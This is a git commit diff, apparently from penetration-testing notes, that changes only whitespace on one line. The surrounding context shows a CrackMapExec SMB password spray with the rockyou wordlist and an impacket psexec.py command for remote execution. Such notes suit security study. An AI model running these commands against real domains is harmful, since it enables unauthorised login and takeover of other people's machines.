bump
This commit is contained in:
parent
0327cf3f88
commit
c0d1f66adb
|
@ -4,7 +4,7 @@
|
||||||
```sh
|
```sh
|
||||||
cme smb domain.name -u <user> s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
|
cme smb domain.name -u <user> s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
|
||||||
```
|
```
|
||||||
* Use the password with `impacket/examples/psexec.py` in the following way
|
* Use the password with `impacket/examples/psexec.py` in the following way
|
||||||
```sh
|
```sh
|
||||||
psexec.py domain.name/<user>:<password>@<target-IP>
|
psexec.py domain.name/<user>:<password>@<target-IP>
|
||||||
```
|
```
|
||||||
|
|
Loading…
Reference in New Issue